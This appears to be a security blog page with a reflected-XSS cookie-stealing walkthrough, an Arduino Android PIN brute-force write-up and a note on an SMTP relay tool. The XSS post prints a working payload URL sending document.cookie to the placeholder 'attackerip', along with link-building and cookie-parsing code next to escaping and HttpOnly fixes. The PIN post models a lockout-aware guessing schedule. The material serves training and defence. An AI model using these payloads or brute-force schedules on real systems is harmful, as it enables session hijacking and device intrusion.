Sunday, August 3, 2014

Refresher Series - Stealing Cookies with XSS

During Capture the Flag (CTF) events, or while learning to pentest, you may be posed with the challenge of logging in to a website without having credentials. This type of attack generally requires a few things: a website (or a protected part of one), a victim who is logged in, and a cross-site scripting (XSS) vulnerability. I have also included the vulnerable web server code at the bottom of the post so you can try it yourself.

  1. The attacker finds a web server vulnerable to XSS.
  2. The user logs into the web server.
  3. The attacker sends a message with a malicious link designed to send the cookie to the attacker.
  4. The link is opened and the user unknowingly sends their cookie to the attacker.
  5. The attacker is happy as he logs into the web server with the stolen cookie.

In the example we use reflected XSS. It could also be done with stored XSS; the steps would remain the same, except that there is no need to send the message to the user because the payload fires whenever the page is viewed.
Here are the actual steps taking place:

1. Attacker finds a login page and discovers XSS.

Login Page

User input reflected back to the page
Confirmed XSS

2. A user logs into the site to perform normal business and is given a session ID.

Valid user login


3. The attacker sends a malicious link by email or some other means. The link looks like the one below; the exact payload may vary or need to be URL-encoded.
http://192.168.1.190/login.html?user=test<script>var+i+=+new+Image();i.src="http://attackerip/gimmie.html?cookie="+document.cookie</script>&pass=test

Email tricking user to click the malicious link

4. When the victim opens the link, the page loads and shows an invalid-user message. In the background, however, the injected script sends a request to the attacker's site with the victim's cookie included, where the attacker has a simple Python web server listening. The incoming request shows the cookie sessionid with the value "super_secret_session". Note that this only works because the session cookie was set without the HttpOnly flag; with HttpOnly set, document.cookie would not include sessionid and the request would arrive empty.

Incoming session information

5. The attacker then uses their preferred method to get the cookie into their browser, such as the Web Developer toolbar add-on for Firefox, and adds the cookie.


The attacker then simply visits the site and is automatically logged in.
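The following Python is an added example, not the post's own vulnerable server code: it models the pieces of the attack above as pure functions so it runs offline. The login URL, the sessionid value and the "attackerip" placeholder are taken from the post; the response HTML and the collector's request line are constructed here. Alongside the reflection the post exploits, it shows the two server-side fixes that break the attack: HTML-escaping the reflected parameter, and setting HttpOnly on the session cookie so document.cookie cannot read it.

```python
"""Reflected XSS cookie theft, as in the post, beside the two server-side fixes.

Pure functions so it runs offline: the login page's 'invalid user' response, the
Set-Cookie header the server issues, the attacker's link, and the parser the
attacker's collector would run over the victim's incoming request."""
import html
from http import cookies
from urllib.parse import parse_qs, quote

# Constructed values. 'attackerip' stands in for the collector's real address, as in the post.
ATTACKER_HOST = "attackerip"
PAYLOAD = ('<script>var i = new Image();'
           'i.src="http://%s/gimmie.html?cookie="+document.cookie</script>' % ATTACKER_HOST)


def build_malicious_link(login_url):
    """URL-encode the payload into the user parameter so the link survives e-mail clients."""
    return "%s?user=%s&pass=test" % (login_url, quote("test" + PAYLOAD, safe=""))


def render_login(query_string, escape_output):
    """Render the 'invalid user' response for a failed login.

    escape_output=False reflects the user parameter verbatim, which is the flaw the post
    exploits; escape_output=True HTML-escapes it, so <script> arrives as inert text."""
    user = parse_qs(query_string, keep_blank_values=True).get("user", [""])[0]
    shown = html.escape(user, quote=True) if escape_output else user
    return "<html><body><p>Invalid user: %s</p></body></html>" % shown


def session_cookie_header(http_only):
    """Set-Cookie header sent after a valid login. With HttpOnly set, document.cookie no
    longer exposes sessionid, so the payload above exfiltrates an empty string."""
    jar = cookies.SimpleCookie()
    jar["sessionid"] = "super_secret_session"
    jar["sessionid"]["path"] = "/"
    if http_only:
        jar["sessionid"]["httponly"] = True
    return jar.output(header="Set-Cookie:").strip()


def extract_stolen_cookie(request_line):
    """Pull the cookie out of the request line the victim's browser sends to the collector,
    e.g. 'GET /gimmie.html?cookie=sessionid=super_secret_session HTTP/1.1' (constructed)."""
    _method, target, _version = request_line.split(" ", 2)
    query = target.partition("?")[2]
    raw = parse_qs(query).get("cookie", [""])[0]
    jar = cookies.SimpleCookie()
    jar.load(raw)
    return {name: morsel.value for name, morsel in jar.items()}


if __name__ == "__main__":
    link = build_malicious_link("http://192.168.1.190/login.html")
    query = link.partition("?")[2]
    print(link)
    print(render_login(query, escape_output=False))   # script tag reflected live
    print(render_login(query, escape_output=True))    # script tag neutralised
    print(session_cookie_header(http_only=True))
    print(extract_stolen_cookie("GET /gimmie.html?cookie=sessionid=super_secret_session HTTP/1.1"))
```

Output encoding fixes the injection itself; HttpOnly only limits what a successful injection can steal, so a real fix applies both.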


Below you will find the code for the vulnerable web server. The only requirement is Python.

Wednesday, January 15, 2014

Brute Forcing Android PINs with an Arduino, and an Authentication Weakness

Sticking with the theme this week, I have been bored and haven't been able to sleep well, so I decided to try my hand at brute forcing the PIN on my Samsung Galaxy S3. Annoyingly enough, Android anticipated this: after 5 failed attempts you have to wait 30 seconds. Luckily, that delay doesn't grow with further failures, so automating it is easy. I have seen Hak5's USB Rubber Ducky do this attack, as it simply emulates a keyboard, so I decided to try it with my Arduino, and it works just fine. Going from 0000 to 9999 would take roughly 16 hours, almost all of it spent waiting out lockouts; the odds are you would get it before then.

I also tried the other authentication types on my phone. The most interesting was the pattern lock, which now forces you to create a backup PIN. If a pattern is set and you can't get it, after 5 failed swipe attempts you get the option to enter the backup PIN (see the image below), and the backup PIN does not have the 30 second delay, so you can brute force it all day. That makes for much faster brute forcing.

The Arduino sketch below first tries the top 20 PINs and then starts its brute force cycle. Yes, it will repeat those 20 eventually, but we try them first just in case.

For this attack to work you will need an Arduino Leonardo, or another Arduino that can act as a HID (Human Interface Device), a USB OTG (On-The-Go) cable, and a target device. I always gate my HID sketches behind a switch, because I do not want to race the clock trying to upload a new sketch while the board is typing into my machine.
In all seriousness, this would be a last resort for me; it is going to take a long time. I would try to narrow the keyspace down somehow, for example by eliminating the 0 range, 0000-0999. Do most people start with a zero? Maybe not.


Finally, the backup PIN brute force is, in my opinion, a real issue: without the lockout delay it could be brute forced fairly quickly.
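The following is an added Python model of the schedule and time budget described in this post; it is not the post's Arduino sketch, which is not reproduced here. It orders guesses as the sketch does (a common-PIN list first, then the 0000-9999 sweep), applies the 5-attempt / 30-second lockout the post observed, and treats the backup PIN as the same sweep with no lockout. The list of 20 common PINs is a constructed stand-in, since the post does not list them, and the one-second typing time per guess is an assumption.

```python
"""PIN brute-force schedule and time budget for an Android lock screen.

Added model of the attack in the post: try a list of common PINs first, then sweep
0000-9999, and account for the 30 second lockout Android imposes after every 5 wrong
guesses. A backup PIN with no lockout is the same schedule with lockout_seconds=0."""

# Constructed stand-in for the post's 'top 20 PINs', which the post does not list.
COMMON_PINS = ["1234", "1111", "0000", "1212", "7777", "1004", "2000", "4444", "2222", "6969",
               "9999", "3333", "5555", "6666", "1122", "1313", "8888", "4321", "2001", "1010"]

LOCKOUT_EVERY = 5       # wrong attempts before the lock screen pauses input
LOCKOUT_SECONDS = 30    # pause observed on the Galaxy S3; it does not escalate
TYPING_SECONDS = 1.0    # assumed time for the HID device to type four digits and Enter


def pin_schedule(common=COMMON_PINS, skip=(), dedupe=True):
    """Yield candidate PINs in attack order: the common list, then the full sweep.

    skip: prefixes to drop, e.g. ("0",) removes 0000-0999 as the post suggests.
    dedupe=True does not retry the common PINs during the sweep; the post's sketch
    does retry them, which is dedupe=False."""
    skip = tuple(skip)
    tried = set()
    for pin in common:
        if (skip and pin.startswith(skip)) or pin in tried:
            continue
        tried.add(pin)
        yield pin
    for n in range(10000):
        pin = "%04d" % n
        if skip and pin.startswith(skip):
            continue
        if dedupe and pin in tried:
            continue
        yield pin


def attempts_until(target, **schedule_args):
    """How many guesses the schedule needs to reach target; None if target is skipped."""
    for count, pin in enumerate(pin_schedule(**schedule_args), start=1):
        if pin == target:
            return count
    return None


def seconds_for(attempts, lockout_every=LOCKOUT_EVERY,
                lockout_seconds=LOCKOUT_SECONDS, typing=TYPING_SECONDS):
    """Wall-clock seconds for a run of `attempts` guesses whose last guess is correct.

    Only wrong guesses count toward a lockout, and a lockout costs time only when a
    further guess follows it."""
    wrong = attempts - 1
    return attempts * typing + (wrong // lockout_every) * lockout_seconds


if __name__ == "__main__":
    worst = sum(1 for _ in pin_schedule())
    print("full sweep: %d guesses, %.1f h with lockouts (lockouts alone: %.1f h)"
          % (worst, seconds_for(worst) / 3600, seconds_for(worst, typing=0) / 3600))
    print("backup PIN, no lockout: %.1f h" % (seconds_for(worst, lockout_seconds=0) / 3600))
    print("0xxx excluded: %d guesses" % sum(1 for _ in pin_schedule(skip=("0",))))
```

The lockout-only figure for the full sweep is 1999 lockouts at 30 seconds, about 16.7 hours, which is where the post's "roughly 16 hours" comes from; removing the lockout, as the backup PIN does, leaves only typing time.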

Tuesday, January 14, 2014

Because I was bored

In my quest to keep learning more about Python, I decided to try my hand at making a GUI application, and then thought, why not a simple SMTP tool? Why, you ask? Honestly, some nights are long and boring. I also wanted to write something cross-platform, so I chose wxPython. This was nothing more than a see-if-I-can-do-it exercise. It was an experience, and lining things up wasn't fun. The other thing I wanted to do was compile it to an executable, for which I used PyInstaller. Because of everything a GUI pulls in, the final binary turned out to be 7.5 MB, which is huge. It was still a fun little tool to build, and I learned a lot doing it.

The tool is straightforward: put in the relevant information and hit OK to send. For the server and port fields you will need an email server that acts as an open relay; I use Sendmail or Postfix, and either works just fine. Don't ask me how to set one up, Google it.


Here is an image, and the code is below. I am not liable for how you use this tool, and you are only allowed to use it against targets for which you have permission.


Code Below: